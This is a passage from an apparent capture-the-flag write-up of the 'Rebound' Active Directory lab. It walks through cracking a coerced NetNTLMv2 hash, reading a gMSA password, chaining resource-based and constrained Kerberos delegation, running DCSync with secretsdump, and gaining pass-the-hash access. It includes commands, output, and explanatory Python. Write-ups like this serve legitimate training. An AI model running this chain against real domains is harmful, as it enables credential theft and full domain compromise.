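The two hex blobs KrbRelay printed are the NTLM NEGOTIATE and CHALLENGE messages of the coerced authentication, and decoding them shows what was captured: the 8-byte server challenge in the CHALLENGE message is the third field of the NetNTLMv2 line hashcat gets, the AV_PAIRs name the host that answered, and the NEGOTIATE message carries the client's own workstation name. The following Python is an added example, not part of KrbRelay or the original writeup; the two hex strings are copied from the output above (the CHALLENGE dump has trailing buffer bytes after the message, which the offset-based parsing ignores).

```python
"""Decode NTLM NEGOTIATE (type 1) and CHALLENGE (type 2) messages (added example)."""
import struct
from datetime import datetime, timedelta, timezone

# Copied from the KrbRelay output above
NTLM1_HEX = "4e544c4d535350000100000097b208e2070007002c00000004000400280000000a0063450000000f444330315245424f554e44"
NTLM2_HEX = "4e544c4d53535000020000000e000e003800000015c289e28463988f28bd04e7000000000000000086008600460000000a0063450000000f7200650062006f0075006e00640002000e007200650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e0064002e00680074006200050016007200650062006f0075006e0064002e00680074006200070008003054408876a5db0100000000000000000000000074002e00570069006e0064006f00770068502e4b0b010000"

AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp"}
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000  # NTLMv2-style responses


def _field(buf: bytes, off: int) -> bytes:
    """Len(2) MaxLen(2) Offset(4) descriptor pointing into the payload."""
    length, _maxlen, offset = struct.unpack_from("<HHI", buf, off)
    return buf[offset:offset + length]


def _version(buf: bytes, off: int) -> str:
    major, minor, build = struct.unpack_from("<BBH", buf, off)
    return f"{major}.{minor} build {build}"


def _filetime(raw: bytes) -> datetime:
    ticks = struct.unpack("<Q", raw)[0]  # 100 ns units since 1601-01-01 UTC
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ticks // 10)


def parse_target_info(blob: bytes) -> dict:
    """AV_PAIR list: AvId(2) AvLen(2) Value, terminated by MsvAvEOL (id 0)."""
    pairs, pos = {}, 0
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:
            return pairs
        value = blob[pos:pos + av_len]
        pos += av_len
        name = AV_NAMES.get(av_id, f"AvId{av_id}")
        if av_id == 7:
            pairs[name] = _filetime(value)
        elif av_id == 6:
            pairs[name] = struct.unpack("<I", value)[0]
        else:
            pairs[name] = value.decode("utf-16-le")


def parse_ntlm(hexstr: str) -> dict:
    buf = bytes.fromhex(hexstr)
    if buf[:8] != b"NTLMSSP\x00":
        raise ValueError("missing NTLMSSP signature")
    msg_type = struct.unpack_from("<I", buf, 8)[0]
    if msg_type == 1:  # NEGOTIATE: flags, DomainName and Workstation (OEM strings), Version
        return {"type": 1, "flags": struct.unpack_from("<I", buf, 12)[0],
                "domain": _field(buf, 16).decode("ascii"),
                "workstation": _field(buf, 24).decode("ascii"),
                "version": _version(buf, 32)}
    if msg_type == 2:  # CHALLENGE: TargetName, flags, ServerChallenge, Reserved, TargetInfo, Version
        flags = struct.unpack_from("<I", buf, 20)[0]
        return {"type": 2, "flags": flags,
                "target_name": _field(buf, 12).decode("utf-16-le"),
                "challenge": buf[24:32].hex(),
                "ntlmv2": bool(flags & NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY),
                "version": _version(buf, 48),
                "target_info": parse_target_info(_field(buf, 40))}
    raise ValueError(f"unsupported message type {msg_type}")


if __name__ == "__main__":
    for h in (NTLM1_HEX, NTLM2_HEX):
        print(parse_ntlm(h))
```

The NEGOTIATE message names workstation DC01 in domain REBOUND: the coerced client is the domain controller's own session, which is what the cross-session trick relies on. The CHALLENGE message's server challenge 8463988f28bd04e7 reappears verbatim in the captured `tbrady::rebound:8463988f28bd04e7:...` line.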

Run it through hashcat (mode 5600 = NetNTLMv2):

hashcat -m 5600 'tbrady::rebound:8463988f28bd04e7:01610cb29e4e940afbd48a90f95daac7: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' /usr/share/wordlists/rockyou.txt

Password found: tbrady:543BOMBOMBUNmanda

Sync the clock with the DC before requesting Kerberos tickets (by default the KDC rejects requests whose timestamp is more than 5 minutes off).

ntpdate rebound.htb


getTGT.py -dc-ip 10.10.11.231 rebound.htb/tbrady:543BOMBOMBUNmanda
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in tbrady.ccache

Point the Kerberos tools at the ticket: export KRB5CCNAME=tbrady.ccache

Check that the ticket works; it does. (You could also pass the username and password directly instead of requesting a ticket to read the gMSA password.)

┌──(root㉿escorpion)-[~/htb/Rebound]
└─# nxc ldap rebound.htb -d rebound.htb --use-kcache
SMB rebound.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS rebound.htb 636 DC01 [+] rebound.htb\tbrady

Then read the gMSA password, as the ACL allows.

┌──(root㉿escorpion)-[~/htb/Rebound]
└─# nxc ldap rebound.htb -d rebound.htb --use-kcache --gmsa
SMB rebound.htb 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
LDAPS rebound.htb 636 DC01 [+] rebound.htb\tbrady from ccache
LDAPS rebound.htb 636 DC01 [*] Getting GMSA Passwords
LDAPS rebound.htb 636 DC01 Account: delegator$ NTLM: d0700a7a8e202cbad887ebf92e4d1080

delegator$:d0700a7a8e202cbad887ebf92e4d1080

bloodyAD can fetch delegator$'s hash as well:

┌──(root㉿escorpion)-[~]
└─# bloodyAD -d rebound.htb -u tbrady -p '543BOMBOMBUNmanda' --host dc01.rebound.htb get object 'delegator$' --resolve-sd --attr msDS-ManagedPassword

distinguishedName: CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:d0700a7a8e202cbad887ebf92e4d1080
msDS-ManagedPassword.B64ENCODED: MWi3XbICc9h6/Ln650H9COO5/84q/8lrbQbKFbkZytFOcMdxkROZMsb4bAdoOI2aOZ6cAQX+O69B147bt6B5pINcVQxDyAO4P8Ltj9uP5ex+vQBP1MI2EqeAMIJtWNj3p0W9o8HbwcmkKICZWkyuDC51xbcB+ESLTKtUUbzZ4JiCk+F3d0I/FUAoZXHNDPYXTfvIIBZlnPUNj4tvj9AgXpJd2AF6JyEPsefiEEU2R+dfjjxGPAer0HBADFuVk8Zg2TWhAaxBa3d/IhNuZJw3k935+KhjEIjxYb4qc+/NFvI56kOZFmt2DUjYJ0bz3x8AUlzMNi+4oGUCC5v5MMdwHg==

gMSA abuse

Reconnect with PowerView loaded; for completeness the PowerView query from above is repeated here.

get-domainobjectacl -ResolveGUIDs | where-object { $_.SecurityIdentifier -eq "S-1-1-0" -and $_.ObjectDN -match "CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb" }

Next: delegation.

Unconstrained delegation lets a service account obtain the user's TGT and impersonate that user to any service: maximally permissive and extremely risky. Constrained delegation limits the service account to a pre-approved list of target services (for example LDAP or CIFS), trading some flexibility for safety. Resource-based constrained delegation (RBCD) lets the resource itself decide which accounts may delegate to it, with no domain admin involvement on the delegating side; this decentralised, fine-grained control is the recommended model in modern Active Directory.

BloodHound does not show any delegation edge, but impacket's findDelegation.py finds it.

┌──(root㉿escorpion)-[~]
└─# findDelegation.py rebound.htb/oorend:'1GR8t@$$4u' -dc-ip dc01.rebound.htb -k
/usr/local/bin/findDelegation.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.13.0.dev0+20250401.172759.352695f1', 'findDelegation.py')
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Getting machine hostname
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------------------------------- -------------- --------------------- ----------
delegator$ ms-DS-Group-Managed-Service-Account Constrained http/dc01.rebound.htb No

Delegation without protocol transition means that it is not possible for us to abuse it with a classic "getST". Attempting to do so leads to a Kerberos error:

This happens because of the lack of Protocol Transition, which means that the S4U2Self step does not produce a forwardable ticket, which causes the S4U2proxy step to fail.

In essence, the Service for User to Self (S4U2self) protocol enables a service to request a Service Ticket on another user's behalf, but for its own use. Conversely, the Service for User to Proxy (S4U2proxy) protocol allows a service to request a Service Ticket on another user's behalf, but for a different service.

We can verify this by performing S4U2Self and checking the resulting ticket.

So delegation has to be exercised twice: once against delegator$ itself, to obtain a forwardable ticket to one of its own services, and once against the real target service (http/dc01.rebound.htb). Whether a ticket is forwardable can be checked with `klist -f` (flag F) or impacket's describeTicket.py on the saved ccache. First, request a TGT for delegator$ using the gMSA NT hash:

┌──(root㉿escorpion)-[~/htb/Rebound]
└─# getTGT.py -dc-ip 10.10.11.231 rebound.htb/delegator\$ -hashes ':d0700a7a8e202cbad887ebf92e4d1080'
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in delegator$.ccache

Now set up RBCD. (I know this usage well but not the underlying principle; I will find time to read up on it.)

What the command does: authenticated as delegator$ (the TGT from the ccache, so KRB5CCNAME must point at delegator$.ccache), it writes delegator$'s own msDS-AllowedToActOnBehalfOfOtherIdentity so that ldap_monitor is allowed to obtain service tickets to delegator$ via S4U2Proxy. The write succeeds because of the ACL on the delegator object, which is what the PowerView query above was looking at. Because RBCD is evaluated on the resource side, the KDC does not require the evidence ticket to be forwardable, so ldap_monitor needs no protocol transition either; its only prerequisite is an SPN.

┌──(root㉿escorpion)-[~/htb/Rebound]
└─# rbcd.py rebound.htb/delegator\$ -no-pass -k -delegate-to delegator\$ -delegate-from ldap_monitor -dc-ip 10.10.11.231 -action write -use-ldaps
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] ldap_monitor can now impersonate users on delegator$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)

Obtain a ccache for ldap_monitor and make it the active one:

┌──(root㉿escorpion)-[~/htb/Rebound]
└─# getTGT.py -dc-ip 10.10.11.231 rebound.htb/ldap_monitor:'1GR8t@$$4u'
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in ldap_monitor.ccache
export KRB5CCNAME=ldap_monitor.ccache

Request the service ticket. -spn names the target service's Service Principal Name. (cifs, short for Common Internet File System, is the SMB file-sharing service and the usual choice for reaching a DC's shares such as C$.) Here, though, the SPN is not arbitrary: the KDC resolves it to an account and only grants the S4U2Proxy request if that account's msDS-AllowedToActOnBehalfOfOtherIdentity lists ldap_monitor, so it has to be one of delegator$'s own SPNs, which is why browser/dc01.rebound.htb (registered on delegator$) is used. The resulting ticket is encrypted with delegator$'s key, which is exactly what the next step needs.

getST.py -spn browser/dc01.rebound.htb -impersonate 'dc01$' rebound.htb/ldap_monitor -k -no-pass

If it fails, re-run the earlier steps in order (note that delegator$'s ccache must be the active KRB5CCNAME when rbcd.py runs, and ldap_monitor's when getST.py runs) and try again:

getTGT.py -dc-ip 10.10.11.231 rebound.htb/delegator\$ -hashes ':d0700a7a8e202cbad887ebf92e4d1080'
export KRB5CCNAME=delegator\$.ccache
rbcd.py rebound.htb/delegator\$ -no-pass -k -delegate-to delegator\$ -delegate-from ldap_monitor -dc-ip 10.10.11.231 -action write -use-ldaps
getTGT.py -dc-ip 10.10.11.231 rebound.htb/ldap_monitor:'1GR8t@$$4u'
export KRB5CCNAME=ldap_monitor.ccache

As I recall, this sometimes takes a few attempts.

┌──(root㉿escorpion)-[~/htb/Rebound]
└─# getST.py -spn browser/dc01.rebound.htb -impersonate "dc01$" rebound.htb/ldap_monitor -k -no-pass
/usr/local/bin/getST.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.13.0.dev0+20250401.172759.352695f1', 'getST.py')
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Impersonating dc01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache

Make that ticket the active one:

export KRB5CCNAME=dc01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache

There is one extra ticket request at this point; I read other people's writeups for it because the official one was hard to follow.

What happens here: the service ticket just obtained (dc01$ to browser/dc01.rebound.htb, i.e. to delegator$'s own service) is handed to getST.py with -additional-ticket. getST then skips S4U2Self, which for delegator$ would only yield a non-forwardable ticket, and goes straight to S4U2Proxy, presenting that ticket as evidence. Because the evidence ticket was itself issued by S4U2Proxy it carries the forwardable flag, so the KDC accepts it for delegator$'s classic constrained delegation to http/dc01.rebound.htb and issues a ticket for dc01$ to that service.

This two-stage design is the whole point of S4U: a service must first hold a ticket showing that a user authenticated to it (from S4U2Self or from a real client) before it may ask for a ticket to a pre-authorised downstream service such as SQL or SMB on that user's behalf, rather than to any service it likes.

┌──(root㉿escorpion)-[~/htb/Rebound]
└─# getST.py -spn http/dc01.rebound.htb -impersonate dc01\$ -additional-ticket dc01\$@browser_dc01.rebound.htb@REBOUND.HTB.ccache -hashes :d0700a7a8e202cbad887ebf92e4d1080 -no-pass -k -dc-ip 10.10.11.231 rebound.htb/delegator\$
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Getting TGT for user
[*] Impersonating dc01$
[*] Using additional ticket dc01$@browser_dc01.rebound.htb@REBOUND.HTB.ccache instead of S4U2Self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$@http_dc01.rebound.htb@REBOUND.HTB.ccache
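
To make the failure of the plain getST and the success of the detour concrete, here is a small Python model of the KDC's S4U2Self/S4U2Proxy rules (after MS-SFU 3.2.5.2) run against the accounts in this chain. It is an added example, not code from the writeup, from impacket or from Microsoft, and it is deliberately incomplete: a real KDC also checks PAC signatures, "sensitive and cannot be delegated"/Protected Users restrictions and ticket lifetimes, none of which are modelled. The account data is constructed from what findDelegation.py and rbcd.py printed above; the RIDs of delegator$ and dc01$, the SPN string on ldap_monitor, and the assumption that browser/dc01.rebound.htb is registered on delegator$ (the chain only works if it is) are not taken from the page.

```python
# Added example: a toy model of the KDC's S4U decision rules, not a Kerberos implementation.
# Accounts are constructed from the writeup's output; values marked ASSUMED are not on the page.
from dataclasses import dataclass, field


class KerberosError(Exception):
    """Stands in for the KRB-ERROR (KDC_ERR_BADOPTION etc.) a real KDC would return."""


@dataclass
class Account:
    name: str
    sid: str
    spns: set = field(default_factory=set)
    trusted_to_auth_for_delegation: bool = False                 # protocol transition (T2A4D)
    allowed_to_delegate_to: set = field(default_factory=set)     # msDS-AllowedToDelegateTo (SPNs)
    allowed_to_act_on_behalf: set = field(default_factory=set)   # msDS-AllowedToActOnBehalfOfOtherIdentity (SIDs)


@dataclass
class Ticket:
    client: str        # principal the ticket is issued for (cname / PAC)
    service: str       # sname (SPN)
    forwardable: bool


class KDC:
    def __init__(self, accounts):
        self.accounts = {a.name: a for a in accounts}

    def owner_of_spn(self, spn):
        for acct in self.accounts.values():
            if spn in acct.spns:
                return acct
        raise KerberosError(f"KDC_ERR_S_PRINCIPAL_UNKNOWN: {spn}")

    def s4u2self(self, service, user):
        """A service asks for a ticket to itself on behalf of `user`.
        The KDC issues it, but marks it forwardable only with protocol transition."""
        svc = self.accounts[service]
        if not svc.spns:
            raise KerberosError("S4U2Self requires an SPN on the requesting account")
        return Ticket(user, sorted(svc.spns)[0], forwardable=svc.trusted_to_auth_for_delegation)

    def s4u2proxy(self, service, evidence, target_spn):
        """A service presents `evidence` (a ticket to itself) and asks for a ticket
        to `target_spn` in the name of evidence.client."""
        svc = self.accounts[service]
        if evidence.service not in svc.spns:
            raise KerberosError("evidence ticket is not for the requesting service")
        target = self.owner_of_spn(target_spn)
        # Resource-based: the *target* lists the requester's SID; the forwardable flag is not required.
        if svc.sid in target.allowed_to_act_on_behalf:
            return Ticket(evidence.client, target_spn, forwardable=True)
        # Classic constrained: the *requester* lists the target SPN; the evidence must be forwardable.
        if target_spn in svc.allowed_to_delegate_to:
            if not evidence.forwardable:
                raise KerberosError("KDC_ERR_BADOPTION: evidence ticket not forwardable "
                                    "(constrained delegation without protocol transition)")
            return Ticket(evidence.client, target_spn, forwardable=True)
        raise KerberosError(f"KDC_ERR_BADOPTION: {service} may not delegate to {target_spn}")


DOMAIN_SID = "S-1-5-21-4078382237-1492182817-2568127209"   # from the rbcd.py output


def rebound_domain():
    """Accounts as they appear in the writeup. RIDs other than ldap_monitor's are ASSUMED."""
    delegator = Account("delegator$", DOMAIN_SID + "-9001",                 # RID ASSUMED
                        spns={"browser/dc01.rebound.htb"},                 # ASSUMED to be on delegator$
                        allowed_to_delegate_to={"http/dc01.rebound.htb"})  # findDelegation.py output
    ldap_monitor = Account("ldap_monitor", DOMAIN_SID + "-7681",            # SID from rbcd.py output
                           spns={"ldap_monitor/rebound.htb"})              # SPN string ASSUMED
    dc01 = Account("dc01$", DOMAIN_SID + "-1000",                           # RID ASSUMED
                   spns={"http/dc01.rebound.htb", "cifs/dc01.rebound.htb", "ldap/dc01.rebound.htb"})
    return KDC([delegator, ldap_monitor, dc01])


def classic_getst(kdc):
    """getST.py -spn http/dc01.rebound.htb -impersonate dc01$ rebound.htb/delegator$ (no -additional-ticket)."""
    evidence = kdc.s4u2self("delegator$", "dc01$")            # issued, but NOT forwardable
    return kdc.s4u2proxy("delegator$", evidence, "http/dc01.rebound.htb")


def classic_getst_fails(kdc):
    try:
        classic_getst(kdc)
        return False
    except KerberosError:
        return True


def rbcd_detour(kdc):
    """The writeup's chain: rbcd.py write, getST as ldap_monitor, getST as delegator$ with -additional-ticket."""
    # rbcd.py -delegate-to delegator$ -delegate-from ldap_monitor (run as delegator$)
    kdc.accounts["delegator$"].allowed_to_act_on_behalf.add(kdc.accounts["ldap_monitor"].sid)
    # getST.py -spn browser/dc01.rebound.htb -impersonate dc01$ rebound.htb/ldap_monitor
    self_ticket = kdc.s4u2self("ldap_monitor", "dc01$")                # not forwardable; RBCD does not care
    evidence = kdc.s4u2proxy("ldap_monitor", self_ticket, "browser/dc01.rebound.htb")   # forwardable
    # getST.py -spn http/dc01.rebound.htb -impersonate dc01$ -additional-ticket <evidence> rebound.htb/delegator$
    return kdc.s4u2proxy("delegator$", evidence, "http/dc01.rebound.htb")


if __name__ == "__main__":
    print("classic getST as delegator$ fails:", classic_getst_fails(rebound_domain()))
    print("RBCD detour yields:", rbcd_detour(rebound_domain()))
```

The model reproduces the two behaviours the writeup relies on: delegator$'s own S4U2Self ticket is never forwardable, so classic constrained delegation rejects it, while a ticket that came out of an S4U2Proxy exchange (here the RBCD hop from ldap_monitor) is forwardable and can be fed back into the constrained-delegation check as evidence.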

Dump secrets with secretsdump.py. The cached ticket is for http/dc01.rebound.htb, but it is encrypted with DC01$'s key and the service class is not validated on the receiving side, so DC01 accepts it for the DRSUAPI (DCSync) call as well; impacket simply reuses whatever ticket for that host is in the cache. Impersonating dc01$ matters because a domain controller's computer account holds the replication rights that DCSync needs.

┌──(root㉿escorpion)-[~/htb/Rebound]
└─# secretsdump.py dc01.rebound.htb -k -just-dc-user administrator
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__('pkg_resources').run_script('impacket==0.13.0.dev0+20250401.172759.352695f1', 'secretsdump.py')
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
[*] Cleaning up...

Connect with evil-winrm using the Administrator NT hash (pass-the-hash):

evil-winrm -i rebound.htb -u administrator -H 176be138594933bb67db3b2572fc91b8

Summary

  • RID 枚举
  • AS-REP-roasting
  • Kerberoasting
  • rbcd

Ref